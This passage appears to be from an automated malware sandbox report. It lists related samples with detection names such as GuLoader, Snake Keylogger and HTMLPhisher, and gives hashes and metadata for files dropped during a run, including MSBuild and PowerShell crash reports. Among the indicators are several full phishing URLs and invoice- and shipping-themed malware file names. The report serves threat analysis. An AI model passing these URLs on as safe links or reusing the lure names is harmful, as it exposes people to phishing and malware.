                          • 20.190.159.73
                          http://email.e.quickshipping.com/c/eJxszLFSxCAQgOGnId1lYHchWFDY5D042JOdXGJkg45v72ht-88_X03gYiw8cXILUIjBeze1RKEwBLTBu5CDj2gBGWPMD-I7P9wkCSyQjRCcRwKcq1uWSEzW40spdTFkef4YUjZtcp5yvM3lfZ-eqV3XqQZfDawG1jtv0ud8ZeUmfc8b99_PwPp13uQoz1FZDaydq3QulwHUPatmQ3a079vQP7an_-pngp8AAAD__zWIRVUGet hashmaliciousUnknownBrowse
                          • 20.190.159.73
                          https://t.co/CFNobJuJq9Get hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          http://esc-dot-wind-blade-416540.uk.r.appspot.comGet hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          Status Update ECKY2.htmlGet hashmaliciousUnknownBrowse
                          • 20.190.159.73
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 20.190.159.73
                          file.exeGet hashmaliciousUnknownBrowse
                          • 20.190.159.73
                          Electronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          https://email-10.moengage.com/v1/emailclick?q=J9hmu1r6QKZrUydA7M0LhmLQ5i7Dg0Nl6MHK33dlRRiHDGLaUmrV29w-y9KVmRzhTLgNQhsm45GxW8V8xKrQoKNDHjB7CRmg_1cweH.uPLe.3eHt_gc8HUYJyNafgEERmJL2LxAT8X7OcG6eGtfAfBO9PAxgYyMwORkMW2Shu_8EgxVomZ4n5YVrJ6BeKFaCmD6d2Q4-0na_EglsL0Brj6yR2v6QG0HeFNJCVHWIDqcMyqe_r88-cETjiVnbQ8n6AdsU8zQ3H7iztnEZXRzETHYdGTm5hvYgsr5Sg7bkrF81eht6fM_e-ibIZP2oMLvBT1zWn_xe_wasEim1gTvVJRTqev1AuuHjN-EARFMZfriSXRqAx2EgGZLcoc2EiPI4kOQISdubWyzK9Xtj10aCP_wAt6KxwJRnrrWNRvn3blBJWnngxtQFXjDGd_qwCgdLvQwPLy5R0skEjnG0HC7MA#V2xjMVEyVlhTWHBSYlhocVRVVktkbGRXWkRSak1XdDVUMVJHYVdKc1NURlVSekExWlZad00xQlVNRDA9Get hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          54328bd36c14bd82ddaa0c04b25ed9adStatement of Account.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          Remesas Aceptadas.PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          factura n#U00famero 55242.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          FACTURA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          FACTURA PENDIENTE DE COBRO P24PM0531563.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          Nakliye belgeleri.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.7263271050864718
                          Encrypted:false
                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0e:9JZj5MiKNnNhoxun
                          MD5:D6DDF0FC7D71464E81A1A2738FCF1384
                          SHA1:1E30BAC68987CBE0C666215625A00102F701E450
                          SHA-256:BD83CC9E79636ECFE571BBF83E75FF81E211E91D915BBB6F6B3BAB876DB756F5
                          SHA-512:020F1B38D084AC7749E8B64534AD6C4238577D47B8C257ED5CF75DA7F30A979522588BC5F4A7E4B25B35A1A386ED584A16E6AC21D32335FD1EFE40C88D38E39A
                          Malicious:false
                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x11f752f5, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.7555973951815156
                          Encrypted:false
                          SSDEEP:1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
                          MD5:D8E3EC1A728CADB66CED4E7A75B9D059
                          SHA1:D47B9102ACC3A5E7C3FE2C9CB9539A7B7EA973A1
                          SHA-256:298447743B951526B61895805A3330F90FE1D3A6DC1D508302C7BFFB838E5881
                          SHA-512:5179D24BA4B848FDAC6B272DF87FD41A62B06B9A708F6D7744B1EDF31D1F0D1198141F7DACB487F383EE89755D9B014723B2CA98F6C0B8CD49D4412C1A3A4088
                          Malicious:false
                          Preview:..R.... .......7.......X\...;...{......................0.e......!...{?.;....|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................^...;....|..................~.GD;....|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.07772046763431725
                          Encrypted:false
                          SSDEEP:3:2tEYepor5ANaAPaU1lqic3FilluxmO+l/SNxOf:Zzpor5ANDPaUiLogmOH
                          MD5:95B9773EB9944800084C57679FA03B9C
                          SHA1:B3E20C865CC9D5BA0E59B55937A7A72067FA9F70
                          SHA-256:EA8B2113D0FEF78DF5B29D97CC9DFB39101A22BB2A0EA77AFB276AB6ABA713F7
                          SHA-512:5BF0C4FD5E6928D33CC8BA732D2AE3E5BCCF55165F3C4BBB7A84C94E888540801BF570F997365CDFC20B6A7635F229370CF92DAC34ED68D4FC04C8E1136BDDDD
                          Malicious:false
                          Preview:.I8b.....................................;...{..;....|...!...{?..........!...{?..!...{?..g...!...{?.................~.GD;....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_1391fdf18fce9611e7ebad568844f3ce9010feab_c971f06d_1a33de68-415c-4d21-a784-b4668b7aa29d\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0209242630238817
                          Encrypted:false
                          SSDEEP:192:5zzcOOdrK0BU/Kai0+mTzuiFyZ24IO8m:d7OdtBU/Ka79zuiFyY4IO8m
                          MD5:962A6626910F8BF0E979A83C8CA468F5
                          SHA1:0EC4E8321A4037A059B184F9F20FD9E8E6237DFA
                          SHA-256:E3BB203543E0ABC78D6260D3A9676B6CB05D314C1B9546A1533B207B50D32E66
                          SHA-512:2DC8F282E319677D97F5BA1BE5162343CAD60AB2035D109E0AB4C6534627D2A03A1A041527EA66BEE86EB21B84913BA385A904A677AA30FB8CEE8568B42EFCA2
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.4.4.9.5.5.8.4.3.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.5.0.2.7.7.1.7.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.3.3.d.e.6.8.-.4.1.5.c.-.4.d.2.1.-.a.7.8.4.-.b.4.6.6.8.b.7.a.a.2.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.c.0.5.8.c.4.-.7.f.3.6.-.4.d.b.e.-.8.0.6.0.-.8.4.d.7.6.e.2.5.0.5.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.6.0.-.0.0.0.1.-.0.0.1.5.-.7.6.c.4.-.8.2.8.3.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.d.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_1391fdf18fce9611e7ebad568844f3ce9010feab_c971f06d_284e96a9-d937-48e9-bc99-8e8d88150844\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.020928865887944
                          Encrypted:false
                          SSDEEP:192:UzIatcOTdrK0BU/Kai0+mTzuiFyZ24IO8m:PaFTdtBU/Ka79zuiFyY4IO8m
                          MD5:D66040ACCA9BFF5A5F33B2F68E27159D
                          SHA1:DEB34DFA3F684D75EA7FB756DDF44B423861EB37
                          SHA-256:8527694E3F3EF2954ABC3603D566918CF7A71CF2D79943E3AE541FE804FCEE89
                          SHA-512:13BC00AE564C0B833F242D4BA89A2DCE6AE81D4B9BC8B72A20B2EAC684271A69C894F7A3D428A83E77F65C73D1064211B5A4551D16FEFCC64E1B9F839FF97F02
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.4.1.9.0.3.1.0.5.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.2.0.1.5.6.0.5.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.4.e.9.6.a.9.-.d.9.3.7.-.4.8.e.9.-.b.c.9.9.-.8.e.8.d.8.8.1.5.0.8.4.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.9.f.8.0.8.5.-.6.6.a.7.-.4.b.6.5.-.b.b.e.0.-.b.6.c.f.4.6.7.6.c.9.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.9.0.-.0.0.0.1.-.0.0.1.5.-.f.6.6.c.-.f.e.7.0.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.d.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_1391fdf18fce9611e7ebad568844f3ce9010feab_c971f06d_2e43c2c4-838b-42d3-b7ee-15496157039b\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0207972695774772
                          Encrypted:false
                          SSDEEP:192:ffRNcO/sdrK0BU/Ka6U+mTzuiFyZ24IO8m:nRl0dtBU/KaT9zuiFyY4IO8m
                          MD5:03A68FB46E2EAC163DFA32DFC3ACC298
                          SHA1:A4E5426F4C05D008FA5DBF7CE96E24DE64E6762E
                          SHA-256:B3593468916DE64B9B4A999EBDC4BF053220B352B2F6E2F80AE87F481A4BD5A0
                          SHA-512:6E8A724E4E3782EAE1CFBF015985E808AC8DEA8E9078F102EAF1766CB26B52A6504A5E7BADB445F0A5C3E4BD27F0E458C5D76CC7B7003520528E650F9F7AD4CC
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.4.3.3.3.2.6.6.0.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.3.4.1.2.3.4.8.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.4.3.c.2.c.4.-.8.3.8.b.-.4.2.d.3.-.b.7.e.e.-.1.5.4.9.6.1.5.7.0.3.9.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.d.3.f.5.1.8.-.3.0.b.d.-.4.a.a.c.-.b.1.b.c.-.0.0.5.b.a.d.c.c.5.9.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.3.4.-.0.0.0.1.-.0.0.1.5.-.7.e.3.6.-.d.c.7.9.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.d.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_1391fdf18fce9611e7ebad568844f3ce9010feab_c971f06d_a7760778-d692-44af-a87f-1b51435c8703\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0208320194656795
                          Encrypted:false
                          SSDEEP:192:4YccO7drK0BU/KaS0+mTzuiFNZ24IO8m:vc7dtBU/Kar9zuiFNY4IO8m
                          MD5:D2B871D8DF2341EE855893FF075A34AF
                          SHA1:DBA5D1EE79A31B54E33408C25D898E585A4DCAA0
                          SHA-256:40ADE1B4EEAA490C920292588A8BDF4BC205905F6A62B692A6D076EC5553EB8E
                          SHA-512:868F5461681F815FE5A7264DC8602D20240B88C40F5D7A53CEAFF3A6F214E60EB8D9EE224D963F835D042E55C80510D69BFF40AD9089098663E2BAFC7709BB7E
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.4.6.6.4.8.5.7.3.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.6.7.2.5.1.3.6.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.7.6.0.7.7.8.-.d.6.9.2.-.4.4.a.f.-.a.8.7.f.-.1.b.5.1.4.3.5.c.8.7.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.4.c.f.7.6.9.-.a.a.b.3.-.4.e.5.7.-.b.8.f.6.-.3.5.4.0.8.3.6.a.1.0.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.7.4.-.0.0.0.1.-.0.0.1.5.-.b.3.e.7.-.3.6.8.d.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.d.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_1391fdf18fce9611e7ebad568844f3ce9010feab_c971f06d_b739a78d-41be-40a0-a67e-883bb739b228\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0207239645442305
                          Encrypted:false
                          SSDEEP:192:EFDhcOTdrK0BU/Ka6E+mTzuiFyZ24IO8m:Y5TdtBU/Kaz9zuiFyY4IO8m
                          MD5:82DFE1F41092A3DE594E0B33E08056BF
                          SHA1:5CD1BDCEB9C011EDA5A405EB55C7C0D3D29A5266
                          SHA-256:0AC734556BFE82A2D4996C4607D614992F99656ED118FDD97CA1AB917E39312C
                          SHA-512:0C0D7808AEE5D89065494E59DC2718B572E0AA124F3B93136C67A41C770F223E146712B050FA1BA0B6D37D0E13810DB4CE1C5DD13639E987944B2679FEE60705
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.4.0.6.9.9.6.6.2.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.0.8.3.7.1.6.3.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.3.9.a.7.8.d.-.4.1.b.e.-.4.0.a.0.-.a.6.7.e.-.8.8.3.b.b.7.3.9.b.2.2.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.9.b.5.d.e.f.-.b.7.c.0.-.4.2.4.e.-.b.b.a.2.-.c.e.2.e.a.7.8.2.2.a.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.2.0.-.0.0.0.1.-.0.0.1.5.-.6.d.5.a.-.b.f.6.9.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.d.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_119babc0-c119-4410-a6ce-083155f509a9\Report.wer

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5343336477673574
                          Encrypted:false
                          SSDEEP:96:SHsvFggj2arxYidlRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAGSf/VXTT:SSKC7mGlR30wAAzuiFs+Z24lO8
                          MD5:348F00B1A4C43FE448210D309EB96729
                          SHA1:F6DCDB06464AD5BDE722E775C9A9DD3DE521232C
                          SHA-256:D97610A78E7F9CF8E0FDDF34578395977FED9A299E0E9F29E0F433742EC0AC79
                          SHA-512:F5C53F8E3D11672BE99B9146BB0F1554518F2464D78093D0FA423D346256F8360EC96DA49B5CD2DABAC37E5208B045CA14C9B266F7B9443B4D3937E4D6702F0A
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.4.7.1.3.7.7.0.8.1.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.0.7.5.4.3.0.8.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.9.b.a.b.c.0.-.c.1.1.9.-.4.4.1.0.-.a.6.c.e.-.0.8.3.1.5.5.f.5.0.9.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.b.4.-.0.0.0.1.-.0.0.1.5.-.3.a.a.6.-.3.a.6.5.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_6405b92d-62d2-455b-8ebe-be05040f6060\Report.wer

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5342068398930002
                          Encrypted:false
                          SSDEEP:96:tsGF7p4jhrxYid64RH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTADf/VXT5W:56hmG64R30wAAzuiFjZ24lO8
                          MD5:654FEB9E68B47B14D20A4E0F2F59D3E5
                          SHA1:D875AB640C55204FED916006C26E2FCBDC510453
                          SHA-256:045E02D87210BC0F81D9AFF4018343C053DAD297CB3C0C9D9893684802DB02FB
                          SHA-512:7D2D32B90D5B9AB807B8A8AEB847AD4325726D8752602E72AB876DBFC1E6892FB509B89D49B0516DBB265B524CBADD5A9F47204B7C53AC9CE5514BBECD5CAFCA
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.3.7.3.8.5.8.9.2.6.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.3.4.1.2.9.1.8.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.0.5.b.9.2.d.-.6.2.d.2.-.4.5.5.b.-.8.e.b.e.-.b.e.0.5.0.4.0.f.6.0.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.4.-.0.0.0.1.-.0.0.1.5.-.9.f.f.3.-.0.c.7.8.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_6a84cbbf-50c5-4904-b496-7b896f381c9a\Report.wer

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.53433148620342
                          Encrypted:false
                          SSDEEP:96:RFFrDujlrxYid67nRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTADf/VXT5t:ThD4lmG67nR30wAAzuiFjZ24lO8
                          MD5:8E9C9516C8D3FDFBDCE3C85C64FF3928
                          SHA1:D6802D1238F1A96272DB610FD9F30CE9B1868BD0
                          SHA-256:6AC3CEA78A99530DF56E23C9CBEE080C129D7BFA0FC7247C14276A9FE93A4C26
                          SHA-512:0F8E944F1D3B86DD3C241EA9E0D2F77B0104FD74C03331A4FC10EDADF68D983ACFA2A6C723031FF5EFA0C117CD820CDBC757EC9DCE2930040573C9A96C3517EF
                          Malicious:false
